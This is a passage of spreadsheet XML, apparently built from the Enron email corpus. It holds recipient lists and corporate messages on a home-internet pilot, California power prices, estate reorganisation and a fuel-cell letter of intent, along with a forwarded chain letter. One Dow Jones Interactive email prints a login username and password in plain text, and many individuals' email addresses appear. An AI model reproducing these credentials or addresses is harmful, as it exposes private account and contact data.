    <t>frozenset({'genej@nepco.com', 'michel.nelson@enron.com', 'amy.gambill@enron.com', 'dave.gerstenkorn@enron.com', 'chris.cockrell@enron.com', 'david.mcellin@enron.com', 'mike.deville@enron.com', 'emile.courrege@enron.com', 'stephen.barth@enron.com', "kevin.o'donnell@enron.com", 'dan.bunch@enron.com', 'bridget.maronge@enron.com', 'gene.brantz@enron.com', 'raul.davila@enron.com', 'dolores.lenfest@enron.com', 'susan.gensichen@enron.com', 'kelly.higgason@enron.com', 'melissa.jones@enron.com', 'jo.hill@enron.com', 'dwayne.luzum@enron.com', 'george.margoliner@enron.com', 'gregory.metoyer@enron.com', 'susan.ashley@enron.com', 'keith.mcgaha@enron.com', 'frank.bay@enron.com', 'robert.hurt@enron.com', 'stephen.douglas@enron.com', 'trang.dinh@enron.com', 'chris.love@enron.com', 'chuck.hahn@enron.com', 'adel.morris@enron.com', 'norman.levine@enron.com', 'george.nguyen@enron.com', 'jim.brysch@enron.com', 'peggy.mahoney@enron.com', 'gary.hugo@enron.com', 'paul.harris@enron.com', 'glenn.harbers@enron.com', 'lynn.metzsch@enron.com', 'karen.hulscher@enron.com', 'jennifer.lowry@enron.com', 'kelly.mccain@enron.com', 'susan.huston@enron.com', 'amanda.camacho@enron.com', 'tana.cashion@enron.com', 'michael.mcdonald@enron.com', 'patrick.marchand@enron.com', 'gigi.hall@enron.com', 'karla.dobbs@enron.com', 'kelvin.moore@enron.com', 'balaji.nageswaran@enron.com', 'gayle.muench@enron.com', 'kevin.bosse@enron.com', 'kevin.dumas@enron.com', 'margaret.atkisson@enron.com', 'jerry.britain@enron.com', 'maria.cisneros@enron.com', 'david.hardaway@enron.com', 'teri.ashley@enron.com', 'steve.beck@enron.com', 'don.daze@enron.com', 'paul.anderson@enron.com', 'john.brooks@enron.com', 'timothy.murphy@enron.com', 'ashley.dietz@enron.com', 'sherry.graham@enron.com', 'cheryl.lipshutz@enron.com', 'tom.mertz@enron.com', 'michael.kushner@enron.com', 'monica.edwards@enron.com', 'mark.dypiangco@enron.com', 'charles.falgout@enron.com', 'pamela.blande@enron.com', 'amy.baker@enron.com', 'clara.davis@enron.com', 'reginald.howell@enron.com', 'peter.lu@enron.com', 'connie.emerson@enron.com', 'rita.bianchi@enron.com', 'jeff.capen@enron.com', 'kevin.olmstead@enron.com', 'ryan.deane@enron.com', 'lee.ferrell@enron.com', 'cyndie.balfour-flanagan@enron.com', 'dayna.landers@enron.com', 'kenton.erwin@enron.com', 'linda.adels@enron.com', 'praveen.mellacheruvu@enron.com', 'mary.hubbard@enron.com', 'david.barth@enron.com', 'michael.kief@enron.com', 'derek.anderson@enron.com', 'jodi.dobrinski@enron.com', 'wes.colwell@enron.com', 'samantha.amosson@enron.com', 'leticia.barrios@enron.com', 'mike.denzel@enron.com', 'john.holmer@enron.com', 'jana.mills@enron.com', 'gerardo.martinez@enron.com', 'nate.alvord@enron.com', 'bob.hillier@enron.com', 'brad.coleman@enron.com', 'kelly.lombardi@enron.com', 'lachandra.fenceroy@enron.com', 'danny.doan@enron.com', 'larry.dallman@enron.com', 'rick.buy@enron.com', 'elba.funes@enron.com', 'elspeth.inglis@enron.com', 'kathy.burrows@enron.com', 'bryce.baxter@enron.com', 'kathy.campos@enron.com', 'lorie.belsha@enron.com', 'tammy.anderson@enron.com', 'george.hopley@enron.com', 'steve.dahnke@enron.com', 'andrew.lewis@enron.com', 'william.kasemervisz@enron.com', 'maria.lebeau@enron.com', 'william.may@enron.com', 'gina.corteselli@enron.com', 'anne.beliveaux@enron.com', 'mark.harada@enron.com', 'milton.brown@enron.com', 'naomi.bourg@enron.com', 'milton.clark@enron.com', 'james.moore@enron.com', 'thomas.novark@enron.com', 'morris.clark@enron.com', 'keith.clark@enron.com', 'darryl.kendrick@enron.com', 'ava.garcia@enron.com', 'lorraine.merce@enron.com', 'jordan.mintz@enron.com', 'brad.mcsherry@enron.com', 'william.kohl@enron.com', 'linda.nordhues@enron.com', 'jane.jamison@enron.com', 'amy.adams@enron.com', 'ahmad.mousselli@enron.com', 'penny.crane@enron.com', 'kimberly.hillis@enron.com', 'scott.earnest@enron.com', 'paul.fraser@enron.com', 'christopher.helfrich@enron.com', 'stephen.abbanat@enron.com', 'david.maxwell@enron.com', 'karen.ehlert@enron.com', 'michael.booth@enron.com', 'leo.mark@enron.com', 'darren.mcnair@enron.com', 'cynthia.barrow@enron.com', 'faith.killen@enron.com', 'michelle.maynard@enron.com', 'lenine.jeganathan@enron.com', 'dianna.dupree@enron.com', 'philip.lee@enron.com', 'tina.dunnaway@enron.com', 'deborah.kelly@enron.com', 'larry.hlavaty@enron.com', 'traci.nguyen@enron.com', 'david.brown@enron.com', 'yolanda.lopez@enron.com', 'janie.bonnard@enron.com', 'russell.hardie@enron.com', 'mark.michelman@enron.com', 'sharon.morgan@enron.com', 'timothy.bayles@enron.com', 'robert.george@enron.com', 'joe.brewer@enron.com', 'ronson.kung@enron.com', 'samuel.blaylock@enron.com', 'john.dushinske@enron.com', 'courtney.barker@enron.com', 'valeria.hope@enron.com', 'steve.littel@enron.com', 'orlando.garcia@enron.com', 'karissa.johnson@enron.com', 'jennyl@nepco.com', 'michael.goodman@enron.com', 'leslie.dever@enron.com', 'deborah.durr@enron.com', 'jeff.cullison@enron.com', 'roy.hartstein@enron.com', 'kayla.heitmeyer@enron.com', 'steve.krein@enron.com', 'garhett.clark@enron.com', 'dara.flinn@enron.com', 'jack.mcadoo@enron.com', 'kris.jensen@enron.com', 'brian.hoskins@enron.com', 'mike.ames@enron.com', 'lisa.boussattach@enron.com', 'margaret.doucette@enron.com', 'mike.frank@enron.com', 'james.lawrence@enron.com', 'andrew.lawrence@enron.com', 'lisa.norman@enron.com', 'brenda.barreda@enron.com', 'liz.beddingfield@enron.com', 'perry.frazier@enron.com', 'michael.baust@enron.com', 'paulf@nepco.com', 'kevin.hughes@enron.com', 'sharon.mcknight@enron.com', 'c.chiang@enron.com', 'richard.dimichele@enron.com', 'gordon.heaney@enron.com', 'hasan.kedwaii@enron.com', 'tom.gilbert@enron.com', 'jimo@nepco.com', 'ahmed.malik@enron.com', 'leon.cernoch@enron.com', 'calvin.eakins@enron.com', 'max.eberts@enron.com', 'hilda.akin@enron.com', 'youyi.feng@enron.com', 'luke.martin@enron.com', 'wendy.koh@enron.com', 'eric.brown@enron.com', 'mark.lindquist@enron.com', 'robert.anderson@enron.com', 'daniel.brown@enron.com', 'elyse.kalmans@enron.com', 'juanita.delgado@enron.com', 'lance.norskog@enron.com', 'carmen.ayala@enron.com', 'chris.bowling@enron.com', 'jesse.neyman@enron.com', 'lorraine.lindberg@enron.com', 'richard.kim@enron.com', 'reginald.loche@enron.com', 'fawn.borger@enron.com', 'leslee.hoggatt@enron.com', 'pamela.culpepper@enron.com', 'ginger.mccain@enron.com', 'michael.cuccia@enron.com', 'felicia.buenrostro@enron.com', 'kevin.howard@enron.com', 'larry.hill@enron.com', 'martha.janousek@enron.com', 'lohit.datta-barua@enron.com', 'dan.hyvl@enron.com', 'bill.jordan@enron.com', 'dawn.clennon@enron.com', 'james.kunkel@enron.com', 'ronald.mentan@enron.com', 'victor.negrete@enron.com', 'leo.fajardo@enron.com', 'robert.humlicek@enron.com', 'jay.nigh@enron.com', 'martin.cuilla@enron.com', 'kay.mann@enron.com', 'phil.boggs@enron.com', 'jacque.hull@enron.com', 'richard.amabile@enron.com', 'sonja.galloway@enron.com', 'kevin.davis@enron.com', 'timothy.neil@enron.com', 'beverly.gilmore@enron.com', 'fred.jordan@enron.com', 'vernon.mercaldo@enron.com', 'greg.branan@enron.com', 'felipe.martinez@enron.com', 'belinda.luna@enron.com', 'yasir.khan@enron.com', 'alma.green@enron.com', 'nancy.bagot@enron.com', 'stacy.dickson@enron.com', 'jeffrey.holihan@enron.com', 'jennifer.lev@enron.com', 'yana.kristal@enron.com', 'michael.desbiens@enron.com', 'ed.husami@enron.com', 'stephen.nokk@enron.com', 'richard.abramowicz@enron.com', 'lori.boudreaux@enron.com', 'steve.keith@enron.com', 'huy.dinh@enron.com', 'joe.kishkill@enron.com', 'margie.mcbath@enron.com', 'marcia.anderson@enron.com', 'james.ginty@enron.com', 'frances.garcia@enron.com', 'marla.barnard@enron.com', 'rachel.cady@enron.com', 'richard.johnson@enron.com', 'rowenad@nepco.com', 'stephen.brown@enron.com', 'anne.labbe@enron.com', 'daniel.muschar@enron.com', 'mike.mcgowan@enron.com', 'james.knight@enron.com', 'craig.brown@enron.com', 'richard.brockhan@enron.com', 'bruno.gaillard@enron.com', 'sharon.gonzales@enron.com', 'darryl.free@enron.com', 'karen.hayes@enron.com', 'janice.hollaway@enron.com', 'vance.griffith@enron.com', 'paul.kraske@enron.com', 'robert.hoodis@enron.com', 'steve.cherry@enron.com', 'rachael.mendieta@enron.com', 'richard.lawhorn@enron.com', 'alicia.lenderman@enron.com', 'charles.caine@enron.com', 'searll@opencominc.com', 'glenn.darrah@enron.com', 'fran.mayes@enron.com', 'craig.buehler@enron.com', 'sandra.mcnichols@enron.com', 'michelle.hargrave@enron.com', 'angela.landry@enron.com', 'deborah.heath@enron.com', 'michael.bodnar@enron.com', 'gauri@enron.com', 'will.burks@enron.com', 'debbi.horvath@enron.com', 'deborah.archuleta@enron.com', 'john.anderson@enron.com', 'julie.clyatt@enron.com', 'lamar.frazier@enron.com', 'peggy.determeyer@enron.com', 'duane.bernbeck@enron.com', 'kenneth.martinez@enron.com', 'robinj@nepco.com', 'ladonna.dervin@enron.com', 'david.clements@enron.com', 'mary.joyce@enron.com', 'kenneth.kimbro@enron.com', 'bill.mangels@enron.com', 'vikki.mccullough@enron.com', 'elizabeth.boudreaux@enron.com', 'christa.aguilar@enron.com', 'david.eldridge@enron.com', 'rebecca.carter@enron.com', 'ted.bland@enron.com', 'javier.espinoza@enron.com', 'jaime.navarro@enron.com', 'robert.kilmer@enron.com', 'bobby.kincaid@enron.com', 'steve.mcnear@enron.com', 'diana.monaghan@enron.com', 'jason.althaus@enron.com', 'zarin.imam@enron.com', 'june.nykanen@enron.com', 'cynthia.espinoza@enron.com', 'dana.lee@enron.com', 'tracy.moreschi@enron.com', 'pam.benson@enron.com', 'angela.grohol@enron.com', 'shazia.masood@enron.com', 'brian.miller@enron.com', 'susanc@nepco.com', 'kevin.joyce@enron.com', 'shakira.hosein@enron.com', 'cole.harper@enron.com', 'ann.carethers@enron.com', 'nilay.basu@enron.com', 'mark.cooper@enron.com', 'rita.homan@enron.com', 'deb.cappiello@enron.com', 'robert.hermann@enron.com', 'srinivas.katipamula@enron.com', 'kim.cadena@enron.com', 'susan.brower@enron.com', 'jon.lewis@enron.com', 'linda.lannom@enron.com', 'mark.lindsey@enron.com', 'gay.mayeux@enron.com', 'jeffrey.austin@enron.com', 'dick.jenkins@enron.com', 'carrie.evans@enron.com', 'kathy.fink@enron.com', 'tom.moore@enron.com', 'robert.jones@enron.com', 'marlin.gubser@enron.com', 'david.kubalak@enron.com', 'lydia.cannon@enron.com', 'judy.dyess@enron.com', 'karen.lastovica@enron.com', 'bobb@nepco.com', 'chuck.good@enron.com', 'larry.derrett@enron.com', 'matt.gitchell@enron.com', 'sandra.jones@enron.com', 'mai.nguyen@enron.com', 'shirley.wilson@enron.com', 'randy.lebeau@enron.com', 'paul.henking@enron.com', 'darlene.forsyth@enron.com', 'michael.asman@enron.com', 'carlos.duran@enron.com', 'marla.hernandez@enron.com', 'elizabeth.goodman@enron.com', 'rob.callihan@enron.com', 'jennifer.jordan@enron.com', 'gary.buck@enron.com', 'don.miller@enron.com', 'lisa.mellencamp@enron.com', 'travis.mccullough@enron.com', 'alan.marsh@enron.com', 'paige.cox@enron.com', 'marie.newhouse@enron.com', 'roger.fernandez@enron.com', 'loretta.mcgowan@enron.com', 'constance.charles@enron.com', 'allen.cohrs@enron.com', 'mark.frevert@enron.com', 'kenneth.lim@enron.com', 'jennifer.hillegonds@enron.com', 'joel.lowery@enron.com', 'laura.beneville@enron.com', 'cheryl.arguijo@enron.com', 'elaine.concklin@enron.com', 'peter.makkai@enron.com', 'dan.cummings@enron.com', 'amanda.huble@enron.com', 'sandy.mccary@enron.com', 'michelle.blaha@enron.com', 'steven.january@enron.com', 'christopher.calger@enron.com', 'elizabeth.labanowski@enron.com', 'bac.ly@enron.com'})</t>
  </si>
  <si>
    <t>ClickAtHome Pilot 2 Program - An Invitation</t>
  </si>
  <si>
    <t>We are excited to extend an invitation to you to participate in the second _x000D_
Pilot of Enron's new ClickAtHome program._x000D_
_x000D_
You have been invited to participate by your Human Resources department or a _x000D_
ClickAtHome project member. _x000D_
_x000D_
The ClickAtHome program is Enron's new innovative program to provide eligible _x000D_
employees high-speed internet access where available, with a high-end _x000D_
computer and high-speed internet connection._x000D_
_x000D_
If you are interested in participating in the ClickAtHome pilot program, _x000D_
please read all of the materials below and electronically return the PILOT _x000D_
Agreement with your consent by stating that you accept the terms and _x000D_
conditions of the agreement in a reply e-mail to this invitation._x000D_
_x000D_
_x000D_
_x000D_
Pilot Kickoff2 11-2.ppt - Details pilot member expectations, commitments, and _x000D_
a tentative pilot time table._x000D_
_x000D_
_x000D_
Terms and Conditions - Program terms and conditions. You will be asked to _x000D_
accept or decline these terms and conditions before_x000D_
you order your computer and/or internet connection on the pilot web site._x000D_
_x000D_
_x000D_
Employee Election Agreement - Please read. You will be asked to accept or _x000D_
decline this agreement before you order your computer and/or internet _x000D_
connection on the pilot web site._x000D_
_x000D_
_x000D_
Pilot Agreement - Please return the pilot agreement electronically by _x000D_
replying to this mailbox (clickathomepilot2@enron.com) and stating: "I accept _x000D_
the terms and conditions of this Pilot Participant Agreement."  if you would _x000D_
like to participate.  To sign up for Pilot Two, please return via email by _x000D_
11/10._x000D_
_x000D_
_x000D_
Please note to expect a short ordering period so we can test a high volume at _x000D_
one time.   If you are interested in participating, you may want to start _x000D_
considering your hardware and internet service needs now.  Ordering will _x000D_
begin mid to late November and will end shortly thereafter._x000D_
_x000D_
If you have questions, please send them to clickathomepilot2@enron.com._x000D_
_x000D_
Thank you_x000D_
ClickAtHome Project Team</t>
  </si>
  <si>
    <t>Mon, 4 Dec 2000 07:09:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'monica.lande@enron.com', 'matt.motley@enron.com', 'tom.alonso@enron.com', 'mike.swerzbin@enron.com', 'sean.crandall@enron.com', 'mark.guzman@enron.com', 'tim.belden@enron.com', 'mark.fischer@enron.com', 'phillip.platter@enron.com', 'jeff.richter@enron.com', 'robert.badeer@enron.com', 'diana.scholtes@enron.com'})</t>
  </si>
  <si>
    <t>DJ CalPX Day-Ahead Prices At $250 Cap For Every Hr - Source</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Carla Hoffman/PDX/ECT on 12/04/2000 03:18 _x000D_
PM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Pergher, Gunther" &lt;Gunther.Pergher@dowjones.com&gt;                      _x000D_
     12/04/2000 12:57 PM_x000D_
	_x000D_
_x000D_
To: undisclosed-recipients:;_x000D_
cc:  _x000D_
Subject: DJ CalPX Day-Ahead Prices At $250 Cap For Every Hr - Source_x000D_
_x000D_
_x000D_
20:26 GMT 4 December 2000 *DJ CalPX Day-Ahead Prices At $250 Cap For Every_x000D_
Hr - Source_x000D_
(MORE) Dow Jones Newswires 04-12-00_x000D_
2026GMT_x000D_
Prices Suggest What ISO Pays - Source_x000D_
LOS ANGELES (Dow Jones)--Monday day-ahead prices into the California Power_x000D_
Exchange hit a state-mandated $250 per megawatt hour price cap for every_x000D_
single hour, the first time that has happened in the history of the CalPX,_x000D_
said a source close to the issue._x000D_
"Our on-peak prices are at the cap, our off-peak prices are at the cap, our_x000D_
average price is at the cap," the source said._x000D_
The prices are in line with December balance-of-month forward prices in the_x000D_
Mid Columbia River market electricity hub, which hit $525/MWh, and January_x000D_
forward prices, which hit $475/MWh on Monday._x000D_
Prices in the CalPX, which operates the state's day-of, day-ahead and block_x000D_
forward electricity market, are likely an indication of the prices the_x000D_
Independent System Operator is paying to secure that out-of-state_x000D_
generation, the CalPX source said._x000D_
The California ISO, which must ensure the state's grid reliability and_x000D_
operates 75% of the state real-time market, declared a stage-one electrical_x000D_
emergency Monday, meaning operating reserves were below 7%._x000D_
The ISO said 10,000 MW of power was off line, and issued a call to buy 3,000_x000D_
MW out of state._x000D_
It is strange that the CalPX would hit an across-the-board cap in the_x000D_
winter, as opposed to the traditional high-peak summer season, market_x000D_
sources said. The ISO has had an unusual winter, however, having declared an_x000D_
unprecedented five stage-two power emergencies in November due to a large_x000D_
amount of generation off line for planned and unplanned maintenace._x000D_
-By Jessica Berthold, Dow Jones Newswire; 323-658-3872;_x000D_
jessica.berthold@dowjones.com_x000D_
(END) Dow Jones Newswires 04-12-00_x000D_
2052GMT_x000D_
_x000D_
_x000D_
G_nther A. Pergher_x000D_
Senior Analyst_x000D_
Dow Jones &amp; Company Inc._x000D_
Tel.  609.520.7067_x000D_
Fax. 609.452.3531_x000D_
_x000D_
The information transmitted is intended only for the person or entity to_x000D_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 received_x000D_
this in error, please contact the sender and delete the material from any_x000D_
computer._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 07:53:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'bill.williams@enron.com', 'lisa.bills@enron.com', 'ben.jacoby@enron.com', 'michael.barnas@ps.ge.com', 'kent.shoemaker@ae.ge.com', 'sheila.tweed@enron.com', 'ed.iii@enron.com', 'john.rigby@enron.com', 'scott.dieball@enron.com', 'stephen.swift@ps.ge.com', 'john.schroeder@ps.ge.com', 'roseann.engeldorf@enron.com'})</t>
  </si>
  <si>
    <t>The weekly conference call WILL NOT take place tomorrow (Wednesday, June 6).  _x000D_
I will let you know when/if it is rescheduled this week.  Thanks, Suzanne</t>
  </si>
  <si>
    <t>Fri, 18 Jan 2002 06:37:13 -0800 (PST)</t>
  </si>
  <si>
    <t>People</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Rick. Hope your holding up. We are going to have all of the "on-going concern" activities here in the old building on the 30-31-32 floors. We will be splitting the estate infrastructure into two functions: on-going activities (contracts/assets we will continue to serve and perform under) and wind-up/liquidation activities. Jim Fallon will be managing the latter function and I believe he is staying in the new building for now._x000D_
_x000D_
We need to ensure that we have the appropriate folks from RAC engaged in the on-going concern function. I'd prefer that we continue to have them located near our floors vs. move to another location (as I hear through the grapevine). Could you suggest the folks that would be available to focus exclusively on on-going concern activities, and do you want them to stay on the 28th floor or move onto 31 with us?_x000D_
_x000D_
Thanks._x000D_
</t>
  </si>
  <si>
    <t>Lynn - Oncall</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	Lynn - Oncall_x000D_
_x000D_
Date:		2/24/2001_x000D_
Time:		7:00 AM - 8:00 AM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Thu, 29 Jul 1999 08:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ect.security@enron.com'})</t>
  </si>
  <si>
    <t>Dow Jones Interactive</t>
  </si>
  <si>
    <t>We are pleased to announce that Dow Jones Interactive (DJI), the world's mo=_x000D_
st=20_x000D_
comprehensive business intelligence service and pre-eminent publisher of Th=_x000D_
e=20_x000D_
Wall Street Journal and Barron's, is now available at your desktop. =20_x000D_
_x000D_
In an increasingly competitive global business environment, knowledge of=20_x000D_
major industry changes is essential for growth and profitability.  Use Dow=_x000D_
=20_x000D_
Jones Interactive today to stay informed.  You can put this valuable deskto=_x000D_
p=20_x000D_
tool to work for you immediately._x000D_
_x000D_
Here's how:_x000D_
_x000D_
o Access DJI by launching your web browser on the URL below._x000D_
_x000D_
Your user name and password are:_x000D_
_x000D_
URL: http://djinteractive.com=20_x000D_
User Name:  sshackl_x000D_
Password:    ene796627 =20_x000D_
_x000D_
Note: Please keep this information for future reference.  User Name and=20_x000D_
Password are case sensitive._x000D_
_x000D_
o In Business Newsstand, scan the latest news on the energy industry.=20_x000D_
o In the Publications Library, search over 6,000 publications including tho=_x000D_
se=20_x000D_
covering the energy industry._x000D_
o In CustomClips, set up alerts to competitor activity from around the worl=_x000D_
d.=20_x000D_
o In Company &amp; Industry Center, analyze a potential merger with a full revi=_x000D_
ew=20_x000D_
of a company=01,s performance._x000D_
_x000D_
If you need help getting started, please contact Dow Jones Customer Service=_x000D_
=20_x000D_
at 800-369-7466, support@wsj.dowjones.com, or one of the following Dow Jone=_x000D_
s=20_x000D_
representatives:_x000D_
_x000D_
? Lynn Yost, 713-840-1432, lynn.yost@dowjones.com_x000D_
? Idella Attuquayefio, 713-626-1592, idella.attuquayefio@dowjones.com_x000D_
_x000D_
You may also click on the following URL address and follow the self-directe=_x000D_
d=20_x000D_
tutorial: http://ask.djinteractive.com/SAS/eTraining/etweb/index.htm</t>
  </si>
  <si>
    <t>Tue, 28 Mar 2000 02:57:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.shoemake@enron.com', 'regina.blackshear@enron.com', 'leslie.smith@enron.com', 'yvonne.acosta@enron.com', 'michelle.neville@enron.com', 'melissa.rodriguez@enron.com'})</t>
  </si>
  <si>
    <t>Fwd: FW: FRIENDS</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Judy Hernandez/HOU/ECT on 03/28/2000 _x000D_
10:54 AM ---------------------------_x000D_
_x000D_
_x000D_
Melissa Rodriguez_x000D_
03/28/2000 10:03 AM_x000D_
To: gonzalez316@hotmail.com, Elizabeth Soto/HOU/ECT@ECT, Maria _x000D_
Sandoval/HOU/ECT@ECT, Andrea R Guillen/HOU/ECT@ECT, Judy _x000D_
Hernandez/HOU/ECT@ECT, Leslie Smith/HOU/ECT@ECT, Lisa Shoemake/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Fwd: FW: FRIENDS_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Melissa Rodriguez/HOU/ECT on 03/28/2000 _x000D_
09:58 AM ---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Joe Gonzalez" &lt;gonzalez316@hotmail.com&gt;                           _x000D_
03/28/2000 09:45 AM_x000D_
	_x000D_
_x000D_
To: LMeza@Gatewayhomes.com, CDGonzalez316@AOL.Com, reba4982@aol.com, _x000D_
ggarza@bcm.tmc.edu, vbabelen@netscape.net, mrodrig3@enron.com, _x000D_
Ana.Guzman@coachusa.com, udydz@aol.com_x000D_
cc:  _x000D_
Subject: Fwd: FW: FRIENDS_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&gt;From: Elizabeth Meza &lt;lmeza@gatewayhomes.com&gt;_x000D_
&gt;To: Avis Bellard &lt;abellard@gatewayhomes.com&gt;, 'Carmen'_x000D_
&gt;&lt;lowgmc90@yahoo.com&gt;, 'Diana' &lt;dvalenz@tmh.tmc.edu&gt;, 'Henny'_x000D_
&gt;&lt;marquez@tvpromofl.com&gt;, "'Joe G.'" &lt;gonzalez316@hotmail.com&gt;, 'Lisa'_x000D_
&gt;&lt;mariavalenzuela@bankunited.com&gt;, 'Lorena' &lt;masterlore@aol.com&gt;, 'Pat'_x000D_
&gt;&lt;pbarboza@bcm.tmc.edu&gt;, 'Sonia' &lt;sonia@getamco.com &gt;, Tiffanny Webb_x000D_
&gt;&lt;twebb@gatewayhomes.com&gt;_x000D_
&gt;Subject: FW: FRIENDS_x000D_
&gt;Date: Tue, 28 Mar 2000 09:36:46 -0600_x000D_
&gt;_x000D_
&gt;No need to send it back I know you all care!_x000D_
&gt;-----Original Message-----_x000D_
&gt;From: Avis Bellard_x000D_
&gt;Sent: Tuesday, March 28, 2000 9:31 AM_x000D_
&gt;To: Alma Guzman; Elizabeth Meza; Karen Luce; Tiffanny Webb; Susan Gilliam_x000D_
&gt;Subject: FW: FRIENDS_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;-----Original Message-----_x000D_
&gt;From: Karen Luce_x000D_
&gt;Sent: Tuesday, March 28, 2000 9:08 AM_x000D_
&gt;To: Aimee Brash (E-mail); Aundrea (E-mail); MICHELLE ROSS (E-mail); Vickie_x000D_
&gt;Colavito (E-mail); Kathy Hayes; Avis Bellard_x000D_
&gt;Subject: FW: FRIENDS_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;-----Original Message-----_x000D_
&gt;From: Kathy Hayes_x000D_
&gt;Sent: Tuesday, March 28, 2000 9:04 AM_x000D_
&gt;To: 'TONI@TRANSOCEANIC.COM'; Susan Gilliam; Brigitte Bowman; Michelle_x000D_
&gt;Glover; Karen Luce; Alma Guzman; Arturo Vasquez Jr._x000D_
&gt;Subject: FW: FRIENDS_x000D_
&gt;_x000D_
&gt;-----Original Message-----_x000D_
&gt;From: toni@transoceanic.com [mailto:toni@transoceanic.com]_x000D_
&gt;Sent: Tuesday, March 28, 2000 9:04 AM_x000D_
&gt;To: denisej@transoceanic.com; deniseb@transoceanic.com;_x000D_
&gt;vickie@transoceanic.com; maryd@transoceanic.com; rebecca@transoceanic.com;_x000D_
&gt;jacky@transoceanic.com; sandy@transoceanic.com; dedee@transoceanic.com;_x000D_
&gt;jayi@transoceanic.com; barb@transoceanic.com; kim@transoceanic.com;_x000D_
&gt;marys@transoceanic.com; theresa@transoceanic.com; maryw@transoceanic.com;_x000D_
&gt;Gina.M.Koveleskie@pahou.panmail.com; Kathy Hayes; KAArdh@aol.com;_x000D_
&gt;kimanne@dellnet.com; mdfergusonrdh@dellnet.com_x000D_
&gt;Subject: FW: FRIENDS_x000D_
&gt;Subject:FRIENDS_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;I HOPE I GET THIS BACK_x000D_
&gt;I believe that without a friend you are missing out on a lot!!!_x000D_
&gt;  Don't be confused by friends and acquaintances,_x000D_
&gt;  there is a difference!_x000D_
&gt;  Because I care about you,_x000D_
&gt;It's national care week . . ._x000D_
&gt;and you get to send_x000D_
&gt;  messages to all your friends_x000D_
&gt;   telling them that you_x000D_
&gt;  care about them and make them_x000D_
&gt;feel good about_x000D_
&gt;  themselves and if they write back . . ._x000D_
&gt;   (just once)_x000D_
&gt;  then that means that they care_x000D_
&gt;   about you too._x000D_
&gt;  BUT, you have to send it right now!!_x000D_
&gt;  Send it to everyone you care about and_x000D_
&gt;if they send_x000D_
&gt;  it back . . . that means they care too. . ._x000D_
&gt;  but don't just send it back,_x000D_
&gt;send it on to everyone.._x000D_
&gt;  Have a nice day, and I'm glad we are friends!!!_x000D_
&gt;THIS IS A ROSE OF FRIENDSHIP YOU MUST_x000D_
&gt;  PASS IT TO AT LEAST 4 FRIENDS!!!_x000D_
&gt;  GO!_x000D_
&gt;  @}-----}------_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_______________________________________________________x000D_
Get Your Private, Free Email at http://www.hotmail.com_x000D_
_x000D_
 - image001.jpg_x000D_
 - image002.gif_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 03:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wsmith2@enron.com'})</t>
  </si>
  <si>
    <t>Re: Newsletter</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 04/02/2001 _x000D_
10:24 AM ---------------------------_x000D_
_x000D_
_x000D_
Vasant Shanbhogue_x000D_
04/02/2001 08:54 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Newsletter  _x000D_
_x000D_
Slightly edited version for small typo._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 21 Oct 2000 05:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffery.ader@enron.com', 'ozzie.pagan@enron.com', 'swanita_99@yahoo.com', 'heather.kroll@enron.com', 'scott.healy@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Hi guys,_x000D_
_x000D_
In looking at CRRA's comments to the draft LOI. I have these questions:_x000D_
_x000D_
1.  I'm not sure what we mean by EPC contract.  Is this referring to the Fuel _x000D_
Cell document we are working now, or is there to be another layer? I know _x000D_
this may depend on whether CRRA or someone else is doing the balance of the _x000D_
construction activities._x000D_
_x000D_
2.  He expects one EPC contract, and we had tried to leave room for multiple _x000D_
contracts. Does anyone care?_x000D_
_x000D_
3.  Does CRRA get a full refund of the purchase price if the fuel cells fail _x000D_
the performance tests?  We have discussed with FCE the concept of a _x000D_
proportional reduction if the performance is within 10 percent, then a full _x000D_
reduction as to the failing unit(s) only.  Also, are we planning to mark up _x000D_
the fuel cell contract to recover our fee?  Is our fee at risk for the fuel _x000D_
cells failing to perform? _x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 06:05:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mike.mcconnell@enron.com', 'a..shankman@enron.com'})</t>
  </si>
  <si>
    <t>FW: SATO - MOU</t>
  </si>
  <si>
    <t xml:space="preserve">Mike/Jeff,_x000D_
_x000D_
